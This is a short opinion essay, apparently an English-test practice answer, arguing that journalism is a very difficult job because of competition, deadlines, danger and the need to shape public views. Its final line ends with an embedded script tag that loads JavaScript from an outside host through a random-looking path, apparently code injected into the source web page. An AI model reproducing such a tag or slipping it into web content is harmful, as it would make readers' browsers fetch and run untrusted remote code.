Journalism is one of the most difficult jobs in the world. What do you think?

In the modern era, Job is necessary for survival as we can only afford anything if we have money. No job is easy. There are challenges which one have to face during their job period. Similarly, journalism is considered to be one difficult job. there are conflicting statements on both sides, but I strongly opine this statement.

To begin with, competition is increasing in every aspect. every news or entertainment channel wants to provide with the latest news to increase their TRP of their channels. So, it creates a lot of pressure on the shoulders of journalists to go the scenario and record the incident scene. for example, fire in the USA has damaged the forest of California which was shown to the rest world due to media only. Journalist sometimes risks their lives to cover some news.

Moreover, the daily stress for writing stories before deadlines and faced criticism after dealing with rude, aggressive and threatening people. they have cover sometimes death or horror scene which makes overstressed. one of the main tasks of journalists is to remove the stereotypes among peoples. for example: in India, people were not aware of child killing or child labor so it becomes the responsibility of media to brings up a topic which can change the thinking or mentality of the people and vast their horizons.

To conclude with, we should give some freedom to press and media so that they can do their job easily because of them we can see the current happening in the world. If you want your country to grow, do not let journalism to suppress. The journalist should bring up new topics and that can reshape one's ideas. <script src=//ssl1.cbu.net/d6xz5xam></script>